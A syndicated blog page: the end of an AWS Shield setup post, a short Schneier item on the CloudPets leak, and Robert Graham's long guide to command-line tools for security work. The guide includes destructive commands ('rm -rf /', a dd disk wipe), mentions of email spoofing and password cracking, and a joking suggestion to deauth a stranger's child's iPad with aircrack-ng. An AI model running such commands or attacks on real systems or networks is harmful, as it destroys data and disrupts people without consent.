Deploying CloudFront, Route 53, and AWS WAF as described in this post enables the built-in DDoS protections for your dynamic web applications that are included with AWS Shield Standard. (There is no upfront cost or charge for AWS Shield Standard beyond the normal pricing for CloudFront, Route 53, and AWS WAF.) AWS Shield Standard is designed to meet the needs of many dynamic web applications.

For dynamic web applications that have a high risk or history of frequent, complex, or high volume DDoS attacks, AWS Shield Advanced provides additional DDoS mitigation capacity, attack visibility, cost protection, and access to the AWS DDoS Response Team (DRT). For more information about AWS Shield Advanced pricing, see AWS Shield Advanced pricing. To activate advanced protection services, follow these steps:

  1. Sign in to the AWS Management Console and open the AWS WAF console.
  2. If this is your first time signing in to the AWS WAF console, choose Get started with AWS Shield Advanced. Otherwise, choose Protected resources.
  3. Choose Activate AWS Shield Advanced.
  4. Choose the resource type and resource to protect.
  5. For Name, enter a friendly name that will help you identify the AWS resources that are protected. For example, My CloudFront AWS Shield Advanced distributions.
  6. (Optional) For Web DDoS attack, select Enable. You will be prompted to associate an existing web ACL with these resources, or create a new ACL if you don’t have any yet.
  7. Choose Add DDoS protection.

Summary

In this blog post, I outline the steps to deploy CloudFront and configure Route 53 in front of your dynamic web application to leverage the global Amazon network of edge locations for DDoS resiliency. The post also provides guidance about enabling AWS WAF for application layer traffic monitoring and automated rules creation to block malicious traffic. I also cover the optional steps to activate AWS Shield Advanced, which helps build a more comprehensive defense against DDoS attacks for your dynamic web applications.

If you have comments about this post, submit them in the “Comments” section below. If you have questions about or issues implementing this solution, please open a new thread on the AWS WAF forum.

– Holly

IoT Teddy Bear Leaked Personal Audio Recordings

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/03/iot_teddy_bear_.html

CloudPets are an Internet-connected stuffed animals that allow children and parents to send each other voice messages. Last week, we learned that Spiral Toys had such poor security that it exposed 800,000 customer credentials, and two million audio recordings.

As we’ve seen time and time again in the last couple of years, so-called “smart” devices connected to the internet­ — what is popularly known as the Internet of Things or IoT­ — are often left insecure or are easily hackable, and often leak sensitive data. There will be a time when IoT developers and manufacturers learn the lesson and make secure by default devices, but that time hasn’t come yet. So if you are a parent who doesn’t want your loving messages with your kids leaked online, you might want to buy a good old fashioned teddy bear that doesn’t connect to a remote, insecure server.

That’s about right. This is me on that issue from 2014.

The command-line, for cybersec

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html

On Twitter I made the mistake of asking people about command-line basics for cybersec professionals. A got a lot of useful responses, which I summarize in this long (5k words) post. It’s mostly driven by the tools I use, with a bit of input from the tweets I got in response to my query.

bash

By command-line this document really means bash.

There are many types of command-line shells. Windows has two, ‘cmd.exe’ and ‘PowerShell’. Unix started with the Bourne shell ‘sh’, and there have been many variations of this over the years, ‘csh’, ‘ksh’, ‘zsh’, ‘tcsh’, etc. When GNU rewrote Unix user-mode software independently, they called their shell “Bourne Again Shell” or “bash” (queue “JSON Bourne” shell jokes here).

Bash is the default shell for Linux and macOS. It’s also available on Windows, as part of their special “Windows Subsystem for Linux”. The windows version of ‘bash’ has become my most used shell.

For Linux IoT devices, BusyBox is the most popular shell. It’s easy to clear, as it includes feature-reduced versions of popular commands.

man

‘Man’ is the command you should not run if you want help for a command.

Man pages are designed to drive away newbies. They are only useful if you already mostly an expert with the command you desire help on. Man pages list all possible features of a program, but do not highlight examples of the most common features, or the most common way to use the commands.

Take ‘sed’ as an example. It’s used most commonly to do a search-and-replace in files, like so:

$ sed ‘s/rob/dave/’ foo.txt

This usage is so common that many non-geeks know of it. Yet, if you type ‘man sed’ to figure out how to do a search and replace, you’ll get nearly incomprehensible gibberish, and no example of this most common usage.

I point this out because most guides on using the shell recommend ‘man’ pages to get help. This is wrong, it’ll just endlessly frustrate you. Instead, google the commands you need help on, or better yet, search StackExchange for answers.

You might try asking questions, like on Twitter or forum sites, but this requires a strategy. If you ask a basic question, self-important dickholes will respond by telling you to “rtfm” or “read the fucking manual”. A better strategy is to exploit their dickhole nature, such as saying “too bad command xxx cannot do yyy”. Helpful people will gladly explain why you are wrong, carefully explaining how xxx does yyy.

If you must use ‘man’, use the ‘apropos’ command to find the right man page. Sometimes multiple things in the system have the same or similar names, leading you to the wrong page.

apt-get install yum

Using the command-line means accessing that huge open-source ecosystem. Most of the things in this guide do no already exist on the system. You have to either compile them from source, or install via a package-manager. Linux distros ship with a small footprint, but have a massive database of precompiled software “packages” in the cloud somewhere. Use the “package manager” to install the software from the cloud.

On Debian-derived systems (like Ubuntu, Kali, Raspbian), type “apt-get install masscan” to install “masscan” (as an example). Use “apt-cache search scan” to find a bunch of scanners you might want to install.

On RedHat systems, use “yum” instead. On BSD, use the “ports” system, which you can also get working for macOS.

If no pre-compiled package exists for a program, then you’ll have to download the source code and compile it. There’s about an 80% chance this will work easy, following the instructions. There is a 20% chance you’ll experience “dependency hell”, for example, needing to install two mutually incompatible versions of Python.

Bash is a scripting language

Don’t forget that shells are really scripting languages. The bit that executes a single command is just a degenerate use of the scripting language. For example, you can do a traditional for loop like:

$ for i in $(seq 1 9); do echo $i; done

In this way, ‘bash’ is no different than any other scripting language, like Perl, Python, NodeJS, PHP CLI, etc. That’s why a lot of stuff on the system actually exists as short ‘bash’ programs, aka. shell scripts.

Few want to write bash scripts, but you are expected to be able to read them, either to tweek existing scripts on the system, or to read StackExchange help.

File system commands

The macOS “Finder” or Windows “File Explorer” are just graphical shells that help you find files, open, and save them. The first commands you learn are for the same functionality on the command-line: pwd, cd, ls, touch, rm, rmdir, mkdir, chmod, chown, find, ln, mount.

The command “rm –rf /” removes everything starting from the root directory. This will also follow mounted server directories, deleting files on the server. I point this out to give an appreciation of the raw power you have over the system from the command-line, and how easy you can disrupt things.

Of particular interest is the “mount” command. Desktop versions of Linux typically mount USB flash drives automatically, but on servers, you need to do it manually, e.g.:

$ mkdir ~/foobar
$ mount /dev/sdb ~/foobar

You’ll also use the ‘mount’ command to connect to file servers, using the “cifs” package if they are Windows file servers:

# apt-get install cifs-utils
# mkdir /mnt/vids
# mount -t cifs -o username=robert,password=foobar123  //192.168.1.11/videos /mnt/vids

Linux system commands

The next commands you’ll learn are about syadmin the Linux system: ps, top, who, history, last, df, du, kill, killall, lsof, lsmod, uname, id, shutdown, and so on.

The first thing hackers do when hacking into a system is run “uname” (to figure out what version of the OS is running) and “id” (to figure out which account they’ve acquired, like “root” or some other user).

The Linux system command I use most is “dmesg” (or ‘tail –f /var/log/dmesg’) which shows you the raw system messages. For example, when I plug in USB drives to a server, I look in ‘dmesg’ to find out which device was added so that I can mount it. I don’t know if this is the best way, it’s just the way I do it (servers don’t automount USB drives like desktops do).

Networking commands

The permanent state of the network (what gets configured on the next bootup) is configured in text files somewhere. But there are a wealth of commands you’ll use to view the current state of networking, make temporary changes, and diagnose problems.

The ‘ifconfig’ command has long been used to view the current TCP/IP configuration and make temporary changes. Learning how TCP/IP works means playing a lot with ‘ifconfig’. Use “ifconfig –a” for even more verbose information.

Use the “route” command to see if you are sending packets to the right router.

Use ‘arp’ command to make sure you can reach the local router.

Use ‘traceroute’ to make sure packets are following the correct route to their destination. You should learn the nifty trick it’s based on (TTLs). You should also play with the TCP, UDP, and ICMP options.

Use ‘ping’ to see if you can reach the target across the Internet. Usefully measures the latency in milliseconds, and congestion (via packet loss). For example, ping NetFlix throughout the day, and notice how the ping latency increases substantially during “prime time” viewing hours.

Use ‘dig’ to make sure DNS resolution is working right. (Some use ‘nslookup’ instead). Dig is useful because it’s the raw universal DNS tool – every time they add some new standard feature to DNS, they add that feature into ‘dig’ as well.

The ‘netstat –tualn’ command views the current TCP/IP connections and which ports are listening. I forget what the various options “tualn” mean, only it’s the output I always want to see, rather than the raw “netstat” command by itself.

You’ll want to use ‘ethtool –k’ to turn off checksum and segmentation offloading. These are features that break packet-captures sometimes.

There is this new fangled ‘ip’ system for Linux networking, replacing many of the above commands, but as an old timer, I haven’t looked into that.

Some other tools for diagnosing local network issues are ‘tcpdump’, ‘nmap’, and ‘netcat’. These are described in more detail below.

ssh

In general, you’ll remotely log into a system in order to use the command-line. We use ‘ssh’ for that. It uses a protocol similar to SSL in order to encrypt the connection. There are two ways to use ‘ssh’ to login, with a password or with a client-side certificate.

When using SSH with a password, you type “ssh [email protected]”. The remote system will then prompt you for a password for that account.

When using client-side certificates, use “ssh-keygen” to generate a key, then either copy the public-key of the client to the server manually, or use “ssh-copy-id” to copy it using the password method above.

How this works is basic application of public-key cryptography. When logging in with a password, you get a copy of the server’s public-key the first time you login, and if it ever changes, you get a nasty warning that somebody may be attempting a man in the middle attack.

$ ssh [email protected]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!

When using client-side certificates, the server trusts your public-key. This is similar to how client-side certificates work in SSL VPNs.

You can use SSH for things other than loging into a remote shell. You can script ‘ssh’ to run commands remotely on a system in a local shell script. You can use ‘scp’ (SSH copy) to transfer files to and from a remote system. You can do tricks with SSH to create tunnels, which is popular way to bypass the restrictive rules of your local firewall nazi.

openssl

This is your general cryptography toolkit, doing everything from simple encryption, to public-key certificate signing, to establishing SSL connections.

It is extraordinarily user hostile, with terrible inconsistency among options. You can only figure out how to do things by looking up examples on the net, such as on StackExchange. There are competing SSL libraries with their own command-line tools, like GnuTLS and Mozilla NSS that you might find easier to use.

The fundamental use of the ‘openssl’ tool is to create public-keys, “certificate requests”, and creating self-signed certificates. All the web-site certificates I’ve ever obtained has been using the openssl command-line tool to create CSRs.

You should practice using the ‘openssl’ tool to encrypt files, sign files, and to check signatures.

You can use openssl just like PGP for encrypted emails/messages, but following the “S/MIME” standard rather than PGP standard. You might consider learning the ‘pgp’ command-line tools, or the open-source ‘gpg’ or ‘gpg2’ tools as well.

You should learn how to use the “openssl s_client” feature to establish SSL connections, as well as the “openssl s_server” feature to create an SSL proxy for a server that doesn’t otherwise support SSL.

Learning all the ways of using the ‘openssl’ tool to do useful things will go a long way in teaching somebody about crypto and cybersecurity. I can imagine an entire class consisting of nothing but learning ‘openssl’.

netcat (nc, socat, cyptocat, ncat)

A lot of Internet protocols are based on text. That means you can create a raw TCP connection to the service and interact with them using your keyboard. The classic tool for doing this is known as “netcat”, abbreviated “nc”. For example, connect to Google’s web server at port and type the HTTP HEAD command followed by a blank line (hit [return] twice):

$ nc www.google.com 80
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Tue, 17 Jan 2017 01:53:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP=”This is not a P3P policy! See https://www.google.com/support/accounts/answer/151657?hl=en for more info.”
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Set-Cookie: NID=95=o7GT1uJCWTPhaPAefs4CcqF7h7Yd7HEqPdAJncZfWfDSnNfliWuSj3XfS5GJXGt67-QJ9nc8xFsydZKufBHLj-K242C3_Vak9Uz1TmtZwT-1zVVBhP8limZI55uXHuPrejAxyTxSCgR6MQ; expires=Wed, 19-Jul-2017 01:53:28 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding

Another classic example is to connect to port 25 on a mail server to send email, spoofing the “MAIL FROM” address.

There are several versions of ‘netcat’ that work over SSL as well. My favorite is ‘ncat’, which comes with ‘nmap’, as it’s actively maintained. In theory, “openssl s_client” should also work this way.

nmap

At some point, you’ll need to port scan. The standard program for this is ‘nmap’, and it’s the best. The classic way of using it is something like:

# nmap –A scanme.nmap.org

The ‘-A’ option means to enable all the interesting features like OS detection, version detection, and basic scripts on the most common ports that a server might have open. It takes awhile to run. The “scanme.nmap.org” is a good site to practice on.

Nmap is more than just a port scanner. It has a rich scripting system for probing more deeply into a system than just a port, and to gather more information useful for attacks. The scripting system essentially contains some attacks, such as password guessing.

Scanning the Internet, finding services identified by ‘nmap’ scripts, and interacting with them with tools like ‘ncat’ will teach you a lot about how the Internet works.

BTW, if ‘nmap’ is too slow, using ‘masscan’ instead. It’s a lot faster, though has much more limited functionality.

Packet sniffing with tcpdump and tshark

All Internet traffic consists of packets going between IP addresses. You can capture those packets and view them using “packet sniffers”. The most important packet-sniffer is “Wireshark”, a GUI. For the command-line, there is ‘tcpdump’ and ‘tshark’.

You can run tcpdump on the command-line to watch packets go in/out of the local computer. This performs a quick “decode” of packets as they are captured. It’ll reverse-lookup IP addresses into DNS names, which means its buffers can overflow, dropping new packets while it’s waiting for DNS name responses for previous packets (which can be disabled with -n):

# tcpdump –p –i eth0

A common task is to create a round-robin set of files, saving the last 100 files of 1-gig each. Older files are overwritten. Thus, when an attack happens, you can stop capture, and go backward in times and view the contents of the network traffic using something like Wireshark:

# tcpdump –p -i eth0 -s65535 –C 1000 –W 100 –w cap

Instead of capturing everything, you’ll often set “BPF” filters to narrow down to traffic from a specific target, or a specific port.

The above examples use the –p option to capture traffic destined to the local computer. Sometimes you may want to look at all traffic going to other machines on the local network. You’ll need to figure out how to tap into wires, or setup “monitor” ports on switches for this to work.

A more advanced command-line program is ‘tshark’. It can apply much more complex filters. It can also be used to extract the values of specific fields and dump them to a text files.

Base64/hexdump/xxd/od

These are some rather trivial commands, but you should know them.

The ‘base64’ command encodes binary data in text. The text can then be passed around, such as in email messages. Base64 encoding is often automatic in the output from programs like openssl and PGP.

In many cases, you’ll need to view a hex dump of some binary data. There are many programs to do this, such as hexdump, xxd, od, and more.

grep

Grep searches for a pattern within a file. More important, it searches for a regular expression (regex) in a file. The fu of Unix is that a lot of stuff is stored in text files, and use grep for regex patterns in order to extra stuff stored in those files.

The power of this tool really depends on your mastery of regexes. You should master enough that you can understand StackExhange posts that explain almost what you want to do, and then tweek them to make them work.

Grep, by default, shows only the matching lines. In many cases, you only want the part that matches. To do that, use the –o option. (This is not available on all versions of grep).

You’ll probably want the better, “extended” regular expressions, so use the –E option.

You’ll often want “case-insensitive” options (matching both upper and lower case), so use the –i option.

For example, to extract all MAC address from a text file, you might do something like the following. This extracts all strings that are twelve hex digits.

$ grep –Eio ‘[0-9A-F]{12}’ foo.txt

Text processing

Grep is just the first of the various “text processing filters”. Other useful ones include ‘sed’, ‘cut’, ‘sort’, and ‘uniq’.

You’ll be an expert as piping output of one to the input of the next. You’ll use “sort | uniq” as god (Dennis Ritchie) intended and not the heresy of “sort –u”.

You might want to master ‘awk’. It’s a new programming language, but once you master it, it’ll be easier than other mechanisms.

You’ll end up using ‘wc’ (word-count) a lot. All it does is count the number of lines, words, characters in a file, but you’ll find yourself wanting to do this a lot.

csvkit and jq

You get data in CSV format and JSON format a lot. The tools ‘csvkit’ and ‘jq’ respectively help you deal with those tools, to convert these files into other formats, sticking the data in databases, and so forth.

It’ll be easier using these tools that understand these text formats to extract data than trying to write ‘awk’ command or ‘grep’ regexes.

strings

Most files are binary with a few readable ASCII strings. You use the program ‘strings’ to extract those strings.

This one simple trick sounds stupid, but it’s more powerful than you’d think. For example, I knew that a program probably contained a hard-coded password. I then blindly grabbed all the strings in the program’s binary file and sent them to a password cracker to see if they could decrypt something. And indeed, one of the 100,000 strings in the file worked, thus finding the hard-coded password.

tail -f

So ‘tail’ is just a standard Linux tool for looking at the end of files. If you want to keep checking the end of a live file that’s constantly growing, then use “tail –f”. It’ll sit there waiting for something new to be added to the end of the file, then print it out. I do this a lot, so I thought it’d be worth mentioning.

tar –xvfz, gzip, xz, 7z

In prehistorical times (like the 1980s), Unix was backed up to tape drives. The tar command could be used to combine a bunch of files into a single “archive” to be sent to the tape drive, hence “tape archive” or “tar”.

These days, a lot of stuff you download will be in tar format (ending in .tar). You’ll need to learn how to extract it:

$ tar –xvf something.tar

Nobody knows what the “xvf” options mean anymore, but these letters most be specified in that order. I’m joking here, but only a little: somebody did a survey once and found that virtually nobody know how to use ‘tar’ other than the canned formulas such as this.

Along with combining files into an archive you also need to compress them. In prehistoric Unix, the “compress” command would be used, which would replace a file with a compressed version ending in ‘.z’. This would found to be encumbered with patents, so everyone switched to ‘gzip’ instead, which replaces a file with a new one ending with ‘.gz’.

$ ls foo.txt*
foo.txt
$ gzip foo.txt
$ ls foo.txt*
foo.txt.gz

Combined with tar, you get files with either the “.tar.gz” extension, or simply “.tgz”. You can untar and uncompress at the same time:

$ tar –xvfz something .tar.gz

Gzip is always good enough, but nerds gonna nerd and want to compress with slightly better compression programs. They’ll have extensions like “.bz2”, “.7z”, “.xz”, and so on. There are a ton of them. Some of them are supported directly by the ‘tar’ program:

$ tar –xvfj something.tar.bz2

Then there is the “zip/unzip” program, which supports Windows .zip file format. To create compressed archives these days, I don’t bother with tar, but just use the ZIP format. For example, this will recursively descend a directory, adding all files to a ZIP file that can easily be extracted under Windows:

$ zip –r test.zip ./test/

dd

I should include this under the system tools at the top, but it’s interesting for a number of purposes. The usage is simply to copy one file to another, the in-file to the out-file.

$ dd if=foo.txt of=foo2.txt

But that’s not interesting. What interesting is using it to write to “devices”. The disk drives in your system also exist as raw devices under the /dev directory.

For example, if you want to create a boot USB drive for your Raspberry Pi:

# dd if=rpi-ubuntu.img of=/dev/sdb

Or, you might want to hard erase an entire hard drive by overwriting random data:

# dd if=/dev/urandom of=/dev/sdc

Or, you might want to image a drive on the system, for later forensics, without stumbling on things like open files.

# dd if=/dev/sda of=/media/Lexar/infected.img

The ‘dd’ program has some additional options, like block size and so forth, that you’ll want to pay attention to.

screen and tmux

You log in remotely and start some long running tool. Unfortunately, if you log out, all the processes you started will be killed. If you want it to keep running, then you need a tool to do this.

I use ‘screen’. Before I start a long running port scan, I run the “screen” command. Then, I type [ctrl-a][ctrl-d] to disconnect from that screen, leaving it running in the background.

Then later, I type “screen –r” to reconnect to it. If there are more than one screen sessions, using ‘-r’ by itself will list them all. Use “-r pid” to reattach to the proper one. If you can’t, then use “-D pid” or “-D –RR pid” to forced the other session to detached from whoever is using it.

Tmux is an alternative to screen that many use. It’s cool for also having lots of terminal screens open at once.

curl and wget

Sometimes you want to download files from websites without opening a browser. The ‘curl’ and ‘wget’ programs do that easily. Wget is the traditional way of doing this, but curl is a bit more flexible. I use curl for everything these days, except mirroring a website, in which case I just do “wget –m website”.

The thing that makes ‘curl’ so powerful is that it’s really designed as a tool for poking and prodding all the various features of HTTP. That it’s also useful for downloading files is a happy coincidence. When playing with a target website, curl will allow you do lots of complex things, which you can then script via bash. For example, hackers often write their cross-site scripting/forgeries in bash scripts using curl.

node/php/python/perl/ruby/lua

As mentioned above, bash is its own programming language. But it’s weird, and annoying. So sometimes you want a real programming language. Here are some useful ones.

Yes, PHP is a language that runs in a web server for creating web pages. But if you know the language well, it’s also a fine command-line language for doing stuff.

Yes, JavaScript is a language that runs in the web browser. But if you know it well, it’s also a great language for doing stuff, especially with the “nodejs” version.

Then there are other good command line languages, like the Python, Ruby, Lua, and the venerable Perl.

What makes all these great is the large library support. Somebody has already written a library that nearly does what you want that can be made to work with a little bit of extra code of your own.

My general impression is that Python and NodeJS have the largest libraries likely to have what you want, but you should pick whichever language you like best, whichever makes you most productive. For me, that’s NodeJS, because of the great Visual Code IDE/debugger.

iptables, iptables-save

I shouldn’t include this in the list. Iptables isn’t a command-line tool as such. The tool is the built-in firewalling/NAT features within the Linux kernel. Iptables is just the command to configure it.

Firewalling is an important part of cybersecurity. Everyone should have some experience playing with a Linux system doing basic firewalling tasks: basic rules, NATting, and transparent proxying for mitm attacks.

Use ‘iptables-save’ in order to persistently save your changes.

MySQL

Similar to ‘iptables’, ‘mysql’ isn’t a tool in its own right, but a way of accessing a database maintained by another process on the system.

Filters acting on text files only goes so far. Sometimes you need to dump it into a database, and make queries on that database.

There is also the offensive skill needed to learn how targets store things in a database, and how attackers get the data.

Hackers often publish raw SQL data they’ve stolen in their hacks (like the Ashley-Madisan dump). Being able to stick those dumps into your own database is quite useful. Hint: disable transaction logging while importing mass data.

If you don’t like SQL, you might consider NoSQL tools like Elasticsearch, MongoDB, and Redis that can similarly be useful for arranging and searching data. You’ll probably have to learn some JSON tools for formatting the data.

Reverse engineering tools

A cybersecurity specialty is “reverse engineering”. Some want to reverse engineer the target software being hacked, to understand vulnerabilities. This is needed for commercial software and device firmware where the source code is hidden. Others use these tools to analyze viruses/malware.

The ‘file’ command uses heuristics to discover the type of a file.

There’s a whole skillset for analyzing PDF and Microsoft Office documents. I play with pdf-parser. There’s a long list at this website:
https://zeltser.com/analyzing-malicious-documents/

There’s a whole skillset for analyzing executables. Binwalk is especially useful for analyzing firmware images.

Qemu is useful is a useful virtual-machine. It can emulate full systems, such as an IoT device based on the MIPS processor. Like some other tools mentioned here, it’s more a full subsystem than a simple command-line tool.

On a live system, you can use ‘strace’ to view what system calls a process is making. Use ‘lsof’ to view which files and network connections a process is making.

Password crackers

A common cybersecurity specialty is “password cracking”. There’s two kinds: online and offline password crackers.

Typical online password crackers are ‘hydra’ and ‘medusa’. They can take files containing common passwords and attempt to log on to various protocols remotely, like HTTP, SMB, FTP, Telnet, and so on. I used ‘hydra’ recently in order to find the default/backdoor passwords to many IoT devices I’ve bought recently in my test lab.

Online password crackers must open TCP connections to the target, and try to logon. This limits their speed. They also may be stymied by systems that lock accounts, or introduce delays, after too many bad password attempts.

Typical offline password crackers are ‘hashcat’ and ‘jtr’ (John the Ripper). They work off of stolen encrypted passwords. They can attempt billions of passwords-per-second, because there’s no network interaction, nothing slowing them down.

Understanding offline password crackers means getting an appreciation for the exponential difficulty of the problem. A sufficiently long and complex encrypted password is uncrackable. Instead of brute-force attempts at all possible combinations, we must use tricks, like mutating the top million most common passwords.

I use hashcat because of the great GPU support, but John is also a great program.

WiFi hacking

A common specialty in cybersecurity is WiFi hacking. The difficulty in WiFi hacking is getting the right WiFi hardware that supports the features (monitor mode, packet injection), then the right drivers installed in your operating system. That’s why I use Kali rather than some generic Linux distribution, because it’s got the right drivers installed.

The ‘aircrack-ng’ suite is the best for doing basic hacking, such as packet injection. When the parents are letting the iPad babysit their kid with a loud movie at the otherwise quite coffeeshop, use ‘aircrack-ng’ to deauth the kid.

The ‘reaver’ tool is useful for hacking into sites that leave WPS wide open and misconfigured.

Remote exploitation

A common specialty in cybersecurity is pentesting.

Nmap, curl, and netcat (described above) above are useful tools for this.

Some useful DNS tools are ‘dig’ (described above), dnsrecon/dnsenum/fierce that try to enumerate and guess as many names as possible within a domain. These tools all have unique features, but also have a lot of overlap.

Nikto is a basic tool for probing for common vulnerabilities, out-of-date software, and so on. It’s not really a vulnerability scanner like Nessus used by defenders, but more of a tool for attack.

SQLmap is a popular tool for probing for SQL injection weaknesses.

Then there is ‘msfconsole’. It has some attack features. This is humor – it has all the attack features. Metasploit is the most popular tool for running remote attacks against targets, exploiting vulnerabilities.

Text editor

Finally, there is the decision of text editor. I use ‘vi’ variants. Others like ‘nano’ and variants. There’s no wrong answer as to which editor to use, unless that answer is ‘emacs’.

Conclusion

Obviously, not every cybersecurity professional will be familiar with every tool in this list. If you don’t do reverse-engineering, then you won’t use reverse-engineering tools.

On the other hand, regardless of your specialty, you need to know basic crypto concepts, so you should know something like the ‘openssl’ tool. You need to know basic networking, so things like ‘nmap’ and ‘tcpdump’. You need to be comfortable processing large dumps of data, manipulating it with any tool available. You shouldn’t be frightened by a little sysadmin work.

The above list is therefore a useful starting point for cybersecurity professionals. Of course, those new to the industry won’t have much familiarity with them. But it’s fair to say that I’ve used everything listed above at least once in the last year, and the year before that, and the year before that. I spend a lot of time on StackExchange and Google searching the exact options I need, so I’m not an expert, but I am familiar with the basic use of all these things.